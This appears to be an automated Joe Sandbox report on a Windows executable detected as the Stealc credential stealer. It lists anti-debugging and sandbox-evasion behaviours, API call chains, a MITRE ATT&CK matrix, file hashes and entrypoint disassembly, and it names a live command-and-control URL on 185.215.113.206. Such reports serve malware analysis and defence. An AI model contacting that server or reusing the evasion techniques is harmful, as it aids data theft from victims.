                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1420618 second address: 142061E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1420A5F second address: 1420A7F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC850CE3D3Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007FC850CE3D44h 0x0000000f push eax 0x00000010 push edx 0x00000011 ja 00007FC850CE3D36h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1422662 second address: 142267B instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC8515781D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC8515781DDh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1424EC6 second address: 1424ED0 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC850CE3D36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 142512E second address: 1425138 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC8515781D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1425138 second address: 1425152 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC850CE3D46h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14254A9 second address: 14254F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007FC8515781D8h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 00000018h 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 mov edx, dword ptr [ebp+12541B12h] 0x0000002a push dword ptr [ebp+122D33D7h] 0x00000030 mov edx, 0708AAC6h 0x00000035 push 4D33132Bh 0x0000003a push esi 0x0000003b push eax 0x0000003c push edx 0x0000003d je 00007FC8515781D6h 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14254F2 second address: 14254F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1426B1E second address: 1426B35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jng 00007FC8515781D8h 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f jc 00007FC8515781D6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1426B35 second address: 1426B44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 jo 00007FC850CE3D3Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59E05AF second address: 59E05DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8515781E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FC8515781DEh 0x0000000f push eax 0x00000010 pushad 0x00000011 mov si, dx 0x00000014 push eax 0x00000015 push edx 0x00000016 mov cl, bl 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59E05DC second address: 59E05E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59E05E0 second address: 59E0603 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 jmp 00007FC8515781E0h 0x0000000d mov ebp, esp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 movsx ebx, cx 0x00000015 mov edx, esi 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59E0603 second address: 59E0609 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59E0609 second address: 59E060D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134044E second address: 1340467 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FC850CE3D36h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 je 00007FC850CE3D38h 0x00000017 push esi 0x00000018 pop esi 0x00000019 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 118D871 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 133026F instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 135C9B1 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 118D88F instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 13BEDC3 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_0-37725
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB40F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00EB40F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EAE530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00EAE530
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB47C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00EB47C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EAF7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00EAF7B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EA1710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00EA1710
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EADB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00EADB80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB4B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00EB4B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB3B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00EB3B00
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EABE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00EABE40
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EAEE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00EAEE20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EADF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00EADF10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EA1160 GetSystemInfo,ExitProcess,0_2_00EA1160
                Source: file.exe, file.exe, 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1812029198.0000000001C68000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWR,
                Source: file.exe, 00000000.00000002.1812029198.0000000001C61000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1812029198.0000000001BDE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1812029198.0000000001C35000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
                Source: file.exe, 00000000.00000002.1812029198.0000000001BDE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwares
                Source: file.exe, 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-36537
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-36540
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-36556
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-36552
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-36592
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-36425
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EA4610 VirtualProtect ?,00000004,00000100,000000000_2_00EA4610
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB9BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00EB9BB0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB9AA0 mov eax, dword ptr fs:[00000030h]0_2_00EB9AA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB7690 GetWindowsDirectoryA,GetVolumeInformationA,GetProcessHeap,RtlAllocateHeap,wsprintfA,0_2_00EB7690
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 4408, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB9790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00EB9790
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB98E0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,0_2_00EB98E0
                Source: file.exe, file.exe, 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: $Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EE75A8 cpuid 0_2_00EE75A8
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00EB7D20
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB6BC0 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00EB6BC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB79E0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00EB79E0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB7BC0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00EB7BC0

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.ea0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.1769403587.0000000005850000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1812029198.0000000001BDE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 4408, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.ea0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.1769403587.0000000005850000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1812029198.0000000001BDE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 4408, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts12
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem334
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe41%VirustotalBrowse
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://docs.rs/getrandom#nodejs-es-module-support0%URL Reputationsafe
                http://185.215.113.206/6c4adf523b719729.php=17%VirustotalBrowse
                http://185.215.113.206/6c4adf523b719729.php17%VirustotalBrowse

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.206/6c4adf523b719729.phptrueunknown
                http://185.215.113.206/true
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://185.215.113.206/6c4adf523b719729.php2file.exe, 00000000.00000002.1812029198.0000000001C46000.00000004.00000020.00020000.00000000.sdmpfalse
                    		unknown
                    http://185.215.113.206/6c4adf523b719729.php=file.exe, 00000000.00000002.1812029198.0000000001C35000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                    http://185.215.113.206/hb5file.exe, 00000000.00000002.1812029198.0000000001C46000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      http://185.215.113.206/6c4adf523b719729.php%.efile.exe, 00000000.00000002.1812029198.0000000001BDE000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        http://185.215.113.206file.exe, 00000000.00000002.1812029198.0000000001BDE000.00000004.00000020.00020000.00000000.sdmptrue
                          		unknown
                          http://185.215.113.206/wsfile.exe, 00000000.00000002.1812029198.0000000001C46000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            http://185.215.113.206/6c4adf523b719729.phpa~file.exe, 00000000.00000002.1812029198.0000000001C35000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              https://docs.rs/getrandom#nodejs-es-module-supportfile.exe, file.exe, 00000000.00000003.1769403587.000000000587B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpfalse
                              • URL Reputation: safe
                              		unknown

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              185.215.113.206
                              		unknownPortugal
                              		206894WHOLESALECONNECTIONSNLtrue

                              General Information

                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1544215
                              Start date and time:2024-10-29 04:00:07 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 3m 27s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:1
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:file.exe
                              Detection:MAL
                              Classification:mal100.troj.evad.winEXE@1/0@0/1
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 80%
                              • Number of executed functions: 19
                              • Number of non-executed functions: 134
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Stop behavior analysis, all processes terminated

                              Warnings

                              • Report size getting too big, too many NtQueryValueKey calls found.

                              Simulations

                              Behavior and APIs

                              No simulations

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              185.215.113.206file.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.206/6c4adf523b719729.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206/6c4adf523b719729.php
                              file.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.206/6c4adf523b719729.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206/6c4adf523b719729.php
                              file.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.206/6c4adf523b719729.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206/6c4adf523b719729.php
                              file.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.206/6c4adf523b719729.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206/6c4adf523b719729.php
                              file.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.206/6c4adf523b719729.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206/6c4adf523b719729.php

                              Domains

                              No context

                              ASNs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.206
                              file.exeGet hashmaliciousLummaCBrowse
                              • 185.215.113.16
                              file.exeGet hashmaliciousLummaCBrowse
                              • 185.215.113.16
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206
                              file.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.206
                              file.exeGet hashmaliciousLummaCBrowse
                              • 185.215.113.16
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206
                              file.exeGet hashmaliciousLummaCBrowse
                              • 185.215.113.16
                              file.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.206
                              file.exeGet hashmaliciousLummaCBrowse
                              • 185.215.113.16

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              No context

                              Created / dropped Files

                              No created / dropped files found

                              Static File Info

                              General

                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):7.957814086215835
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 99.96%
                              • Generic Win/DOS Executable (2004/3) 0.02%
                              • DOS Executable Generic (2002/1) 0.02%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:file.exe
                              File size:2'149'888 bytes
                              MD5:1f9bbfe42e611b314849010fb1bbe51c
                              SHA1:5a25bc214ecb669fa11dc91c84c19e5d238125ba
                              SHA256:0a348ff9b393249df44a77c30c8cef6cacc54f9f6d1fcf34bfb195cef3e455b4
                              SHA512:41b1d1987e58f462afe58f788d260e948d8dcc74cf0bb0ca04c65fc2fa30b1062355a787cddbc2a4d49b1d1d586ae4f9c718c73f532c92355022072bc850fdf5
                              SSDEEP:49152:Zz3DrGYYGC9Zmnhb99fRP2wT0STYA2N6GGLcDbVz:h3Dq1G0ZERbPJYcTwZ
                              TLSH:CFA533C16D2E32A3E2ABC0F42E49B73DA74539DADE2F86BF58D198038D0717645D11B8
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b.}.............u^......uk......u_......{v.....fz./.....{f..............uZ......uh.....Rich....................PE..L...8n.g...

                              File Icon

                              Icon Hash:90cececece8e8eb0

                              Static PE Info

                              General

                              Entrypoint:0xb35000
                              Entrypoint Section:.taggant
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                              Time Stamp:0x671E6E38 [Sun Oct 27 16:45:44 2024 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:5
                              OS Version Minor:1
                              File Version Major:5
                              File Version Minor:1
                              Subsystem Version Major:5
                              Subsystem Version Minor:1
                              Import Hash:2eabe9054cad5152567f0699947a2c5b

                              Entrypoint Preview

                              Instruction
                              jmp 00007FC8516783AAh
                              shrd dword ptr [eax], esp, 00000000h
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              jmp 00007FC85167A3A5h
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [ebx], al
                              or al, byte ptr [eax]
                              add byte ptr [0200000Ah], al
                              or al, byte ptr [eax]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
